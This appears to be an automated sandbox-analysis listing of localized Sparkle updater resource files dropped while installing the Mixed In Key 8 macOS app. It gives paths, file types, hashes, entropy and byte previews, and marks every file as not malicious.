                                                                                                    SHA-512:2245BBCB5DD05FCD57567002BEB7886A07D249FF153E83106A56D074FAF5C558AF032B70F3499B758B3093EDD6F5CA0028B0FE73F5A9EE4BABBBC4C5B61A2B08
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.E.M.a.j.k.{.|.....................................................................+.2.E.F.G.H.I.J.K.L.M.N.O.P.Q.R.S.T.U...V.W.].b.f.j.m.n.s................................................................... .#.$.,.-...:.=.>.F.G.H.].a.e.f.h.i.j.p.u.v.{.........................................................................................................'.(.)./.6.7.8.?.@.A.[.^._.a.{...X._..................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.D....4.5.6.7.8.9.:.;.<.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sk.lproj/.BC.T_xTN7cM
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12221
                                                                                                    Entropy (8bit):6.708764021486379
                                                                                                    Encrypted:false
                                                                                                    MD5:D323E22918AE551483034AE6C5F967BE
                                                                                                    SHA1:606FF2F2949747555E00CF566AE6DD773BD1D06E
                                                                                                    SHA-256:447AD3CB34FC7B3B7DBC8EAF51AE8ED0438B9AE1CB57A61E3F1B16E1A8279CA0
                                                                                                    SHA-512:E1B9A0AA2384E6EDE96580741108DD24687E4F8A7F6703F7D0B020E76000B3EE96F0546B85C9A9D917A0FD6C82EA2A7CB118374E2F85366917F67B6EC61095D3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_3sFG1k
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18442
                                                                                                    Entropy (8bit):6.788125149248513
                                                                                                    Encrypted:false
                                                                                                    MD5:712F3649184C4D46DAA74079C3376F18
                                                                                                    SHA1:529E4F067D76A4557F9C7C0FDD3D82744B7C6BBB
                                                                                                    SHA-256:4E98BD793A9A837D1C22EF1973718E8D9DF2C31CFFE988441891E631C61E7A60
                                                                                                    SHA-512:D55B248277B3400685C698549B22C9B4D3CE6E3A9289B4024709C8FA4EC8C97B1BC7A566BD6AC95459671BEB61603DA5F84745C349B160200FCBBE6B2C5E735B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_9fzzoZ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15594
                                                                                                    Entropy (8bit):6.803319539595778
                                                                                                    Encrypted:false
                                                                                                    MD5:6A1ECB3CEADED67700DA651FC72C3039
                                                                                                    SHA1:6C17203EA2105476797625EEB1335429153385E3
                                                                                                    SHA-256:51FCFFA71BBE459DB5FF79A7B5A2820D6DB434AEEB7C7BCE8B29D3C1FCB1D595
                                                                                                    SHA-512:CCED4C7CC7DBB1184AA8CDAA24AB3833D303DCBDEA75A525D88616244A8E63821571BAFF61D749B62346FA816652044AAF4C41E0F9E925E5B9BAEC5B3A1D2562
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.D.L.`.i.j.z.{.......................................................................................'.(.).*._.,.0.4.7.8.=.`.a.b.c.d.p...............................................................................&.).*.2.3.4.?.B.C.L.M.N.c.g.k.l.n.o.p.v.{.|.........................................................................................................%.-.../.5.<.=.>.E.F.G.a.d.e.g.....^.^........................._......................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.C....4.5.6.7.8.9.:.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sl.lproj/.BC.T_w6B9xG
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12131
                                                                                                    Entropy (8bit):6.728992135695625
                                                                                                    Encrypted:false
                                                                                                    MD5:B2B170464DFCF809ADF4957CF02691AA
                                                                                                    SHA1:9CF8001F0F5BDEC15C271CDAA1D4B627637221D4
                                                                                                    SHA-256:343768859D980D41F7212098C238C62CDF6078BBFF48899132726CD7BA504E4F
                                                                                                    SHA-512:920A871612C1F2609A3F9D061FE3B8A0B3743A159E2EE89B6A447E09BF269784C0EC8F26BC341EF8719555AC075112F0E532CD59AC39E394348D7DB1E816978D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w.......................................................................#.&.+.,.1.5.8.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_MHky8h
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12122
                                                                                                    Entropy (8bit):6.742609041199889
                                                                                                    Encrypted:false
                                                                                                    MD5:FDA9C8C7C9BDB86A27F0FEEDB0D628CC
                                                                                                    SHA1:F7B6A3AED1932359139569D1A5CFB5B5491B4910
                                                                                                    SHA-256:CF5C3455E7A9DF28E28DBC4F47EE7B1495ED5976491B3194AF680E22D7CC1979
                                                                                                    SHA-512:414F7DAC20EE997B884105CF1AE37638F46309132401FDC8FEF0C7A87981BC730AF55B0416473B8E271E8BA22A4E4072761A7A4646F31D031FF32E6E207CDEA5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_VVSkgU
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18474
                                                                                                    Entropy (8bit):6.786027320935801
                                                                                                    Encrypted:false
                                                                                                    MD5:3747AE674A2497804179EAFFA9C5D009
                                                                                                    SHA1:1274F0BB00C13D652846EF199CB9C27539FA24B8
                                                                                                    SHA-256:B0DBD0426A2A38897C13567CE5F9A0766E8F43AADA2BA2DDCF29CF2734849701
                                                                                                    SHA-512:529816C1A2B458B12117174D570908359888C319B15A6A1C951B53D6FB97EC215D75F4761F639DD2E2768CAEFD82C83AB641570B474AD80E47518AFABD91B48A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................%.+.,.-.0.3.6.7.9.:.;.<.=.@.A.F.G.K.P.Q.V.W.c.d.e.f.m.n.o.r.v.}...............................................x.`.........................................A.t._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_urUoft
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode English text, with very long lines
                                                                                                    Size (bytes):6652
                                                                                                    Entropy (8bit):3.4251352277593035
                                                                                                    Encrypted:false
                                                                                                    MD5:2746EAE286FF443AD7F211DF027C88B8
                                                                                                    SHA1:058667145C515325D9B2118AA1E18A38A65486F0
                                                                                                    SHA-256:88066F7907A507217DC64049B389B03EF0403A3F9DBE0C2EA43C423FE8187AE1
                                                                                                    SHA-512:E4E75258F6E8E56550154E4F8F30F1E22DFB5D6AB290EB903341ECDBE8FC16BCE2CFEE03C8D84EB098E3190C35EB251DAE473F7B3FEE07B2A2155F0230B3E56A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ..".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .h.a.r. .l.a.d.d.a.t.s. .n.e.d. .o.c.h. ...r. .k.l.a.r. .a.t.t. .a.n.v...n.d.a.!. .V.i.l.l. .d.u. .i.n.s.t.a.l.l.e.r.a. .d.e.t. .o.c.h. .s.t.a.r.t.a. .%.1.$.@. .n.u.?.".;.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .r.e.a.d.-.o.n.l.y. .v.o.l.u.m.e. .l.i.k.e. .a. .d.i.s.k. .i.m.a.g.e. .o.r. .a.n. .o.p.t.i.c.a.l. .d.r.i.v.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .k.a.n. .i.n.t.e. .u.p.p.d.a.t.e.r.a.s. .n...r. .d.e.t. .k...r.s. .f.r...n. .e.n. .s.k.r.i.v.s.k.y.d.d.a.d. .v.o.l.y.m. .s.o.m. .e.n. .s.k.i.v.a.v.b.i.l.d. .e.l.l.e.r. .e.n. .o.p.t.i.s.k. .e.n.h.e.t... .F.l.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/sv.lproj/.BC.T_ze62VW
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15617
                                                                                                    Entropy (8bit):6.806381954032716
                                                                                                    Encrypted:false
                                                                                                    MD5:25D34001752A53DFC7CA88F32C8E2AAB
                                                                                                    SHA1:BC65CDCABC7A2596CC3BFBBF7D05DF986C704143
                                                                                                    SHA-256:1EACADDBF7AA1673DC2E5B6704A850E5B54B3DF2B790A6BA01CF74E9D256A4F8
                                                                                                    SHA-512:5F06CC7692F75DB87A27F6C5CD5E54A2E93937BFABC013AFA3902582978560242AF1221D8B6AAFA4DE390B6529C728699C4E0C631D65B5DBC3478E57D09EC473
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_PZROWp
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):12168
                                                                                                    Entropy (8bit):6.7611402735673884
                                                                                                    Encrypted:false
                                                                                                    MD5:236B61A253B3EFAEF6F8F02AF6AA15B7
                                                                                                    SHA1:2E6DE6333FA75968E3D63B371AC5E8BDB9397E55
                                                                                                    SHA-256:0E73E93B8D92C5623B9947FB57E8C473117673B4F74BCB9063B0F7A6D2EB02F9
                                                                                                    SHA-512:419AE5DACAFA61D671F0B41EFBA18D945C664141D99F2CEF2DDA7D3F886FB34C4FB32CEA68F30E73D54F9E19C1753C332F203F3A297D4E9DC66DA8CC7055EBBB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.=.E.g.h.i.j.k.w..................................................................... .$.'.,.-.2.6.9.B.C.J.O.P.].`.a.b.v.w.{...................................................................................................$.%.&.-.../.D.G.H.J._.}.f.b........................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.........|.............. ...!."[NSClassName...._..SUAutomaticUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.<..4.5.6.7.8.9.:.;...e.h.j.l.s.v.y....>.?.@.....B.C.DXNSSource]NSDestinationWNSLabel.....c.d....F.G.H.I.J.K.L.M.N.O...P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].]._.`.a.b.c.d.W.f\NSWindowRect_..N
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_ceD62m
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):15628
                                                                                                    Entropy (8bit):6.834414513974042
                                                                                                    Encrypted:false
                                                                                                    MD5:B75E225FB768CCAC01EEDC4D95254946
                                                                                                    SHA1:555C811213F960BA3D5B52BB652541C81EC570A3
                                                                                                    SHA-256:37008BC6A1949FABC52A2E02C84DAD652E6831D7DF643603F779CA2ADA621EDF
                                                                                                    SHA-512:B55CED5F17C11A5C065CEFF38E1C33BD435E2C16373ABD15A87B822E067B51DDE349E90E7502F333D10FE414A8369F0BDD5C8741ACD18E9197DE699B63A4A212
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............#.$.*...2.G.O.c.l.m.}.~.....................................................................#.&.'./.0.1.2.7.L.S.f.g.h.i.j.k.l.m.n.o.p.q.r.s.t.u.v...w.x.~.....................................................................".%.(.1.2.:.>.?.H.I.P.Q.U.j.n.r.s.u.v.w.}.......................................................................................................%.&.'.-.5.6.7.=.D.E.F.M.N.O.i.l.m.o.....e.a......................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys........................ ...!."[NSClassName....]SUUpdateAlert..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.F....4.5.6.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_lFq3Qv
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11223
                                                                                                    Entropy (8bit):6.735736806997574
                                                                                                    Encrypted:false
                                                                                                    MD5:31C2E1EA3EAF64965947D151876B3D2F
                                                                                                    SHA1:E8064B4DA48A0857902F827318FA9E909D33A1E3
                                                                                                    SHA-256:D07B6C376A6EAEE96E8E8BBFC070B31B710D7854F7D84FDA5960F4239A36F16C
                                                                                                    SHA-512:89EBC61EA52A8A08F94BCFBE4B604D93801F337645D4B89AA7AA5D5281985B716D63D58059D5A9031352F402961C7380CE380DF88D27EF48FA7E322BFB1F14F3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............h.iX$versionX$objectsY$archiverT$top...............#.$.*...2.;.C.].e.h.l.x.y.z.{.|.}.~.........................................................................&.'.0.1.5.6.;.<.A.F.G.I.K.L.Q.n.o.p.q.z.........................................................................4.m.....M.N...O.P.Q.R.S.T.U.V.W.X.Y.Z.[.\.].^._.b.eU$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys.....q.o.l...........p.. ...!."[NSClassName...._..SUPasswordPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSObject..+...,.-ZNS.objects.....%.&./.0\NSMutableSet../.1.)UNSSet..+...3.:..4.5.6.7.8.9.....7.F.g.j....<.=.>.....@.A.BXNSSource]NSDestinationWNSLabel..........D.E.F.G.H.I.J.K...L.M.N.O.P.Q.R.S.T.U.P.T.X.Y.Z.[.YYNSEnabledWNSFrame_..NSAllowsLogicalLayoutDirectionVNSCell[NSSuperviewXNSvFlagsZNSEditable_..
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/th.lproj/.BC.T_zLS3ez
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):18345
                                                                                                    Entropy (8bit):6.8638135665235565
                                                                                                    Encrypted:false
                                                                                                    MD5:330AFBF3B387FA044225E08A41AFD791
                                                                                                    SHA1:B153381E78B3796CD631CE96AE39029903ED9E96
                                                                                                    SHA-256:9EC4F9C6353CFD6E14F78D0540E96A8E742030C8EB4BB1A5F1698E476B4EBBB5
                                                                                                    SHA-512:271A6658843B9FAE55AA921EA7CB9CBD906175ACA62D724C5BB04BF040E4FDB6DB0A130013A2D9B9D6D93531DB22DCA81289214460E5887C99C4A5086B79E8AB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top................#.$.*...2.E.M.a.j.k.{.|.......................................................................7.=.M.Q.z.{...........................................................................%.&.+.-.0.9.:.A.B.C.D.G.H.M.N.S.s.t.u.v...................................................................................$.*.+.,./.2.5.6.8.9.:.;.<.?.@.E.F.J.O.P.U.V.b.c.d.e.l.m.n.q.u.|...............................................x.`.........................................@.s._...e..............................................................................................U$null.............................................VNSRoot]NSConnections\NSOidsValues_..NSObjectsValues]NSObjectsKeys_..NSAccessibilityOidsValues_..NSVisibleWindows_..NSAccessibilityOidsKeys_..NSAccessibilityConnectorsV$classZNSOidsKeys............................ ...!."[NSClassName...._..SUUpdatePermissionPrompt..%.&.'.(Z$classnameX$classes^NSCustomObject..'.)XNSO
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKUpdate.framework/Versions/A/Frameworks/Sparkle.framework/Versions/A/Resources/tr.lproj/.BC.T_aZZdDV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Little-endian UTF-16 Unicode C program text
                                                                                                    Size (bytes):8442
                                                                                                    Entropy (8bit):3.5481119990129337
                                                                                                    Encrypted:false
                                                                                                    MD5:CDA289488A92A308B32DD89E70E2B74C
                                                                                                    SHA1:E4363CEC52F14EA52A30BE310DCDA28EB2FF53F6
                                                                                                    SHA-256:F7FE4DAD6B1707CC3F7E4224EE037C94D5F37D5EF5CA2CB7F58EEA91068CDEBA
                                                                                                    SHA-512:019B886B07DE1BB6E4E693B79553860ECD235D29619BDCB46458AC841A1C551FA7189AA6FDC0713D7E304DF25E69467CF8BB733A9E6532C77859E2E0247BC5A7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: ../.*. .d.e._.D.E. .v.0...1. .-. .N.o. .c.o.m.m.e.n.t. .p.r.o.v.i.d.e.d. .b.y. .e.n.g.i.n.e.e.r... .*./.....".%.1.$.@. .%.2.$.@. .h.a.s. .b.e.e.n. .d.o.w.n.l.o.a.d.e.d. .a.n.d. .i.s. .r.e.a.d.y. .t.o. .u.s.e.!. .W.o.u.l.d. .y.o.u. .l.i.k.e. .t.o. .i.n.s.t.a.l.l. .i.t. .a.n.d. .r.e.l.a.u.n.c.h. .%.1.$.@. .n.o.w.?.". .=. .".%.1.$.@. .%.2.$.@. .i.n.d.i.r.i.l.d.i. .v.e. .k.u.l.l.a.n.1.m.a. .h.a.z.1.r.!. .^.i.m.d.i. .y...k.l.e.m.e.k. .i.s.t.i.y.o.r. .m.u.s.u.n.u.z.?. .U.y.g.u.l.a.m.a. .y.e.n.i.d.e.n. .b.a._.l.a.t.1.l.a.c.a.k.t.1.r...".;...../.*. .d.e._.D.E. .v.0...1. .-. .N.o. .c.o.m.m.e.n.t. .p.r.o.v.i.d.e.d. .b.y. .e.n.g.i.n.e.e.r... .*./.....".%.1.$.@. .c.a.n.'.t. .b.e. .u.p.d.a.t.e.d. .w.h.e.n. .i.t.'.s. .r.u.n.n.i.n.g. .f.r.o.m. .a. .d.i.s.k. .i.m.a.g.e... .M.o.v.e. .%.1.$.@. .t.o. .y.o.u.r. .A.p.p.l.i.c.a.t.i.o.n.s. .f.o.l.d.e.r.,. .r.e.l.a.u.n.c.h. .i.t. .f.r.o.m. .t.h.e.r.e.,. .a.n.d. .t.r.y. .a.g.a.i.n...". .=. .".%.1.$.@. .u.y.g.u.l.a.m.a.s.1. .d.i.s.k. .k.a.l.1.b.1. .i...e.r.i.s.
